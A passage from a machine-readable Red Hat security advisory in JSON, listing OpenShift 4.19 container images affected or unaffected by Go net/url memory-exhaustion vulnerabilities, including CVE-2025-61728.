"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61728",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:39.965024+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
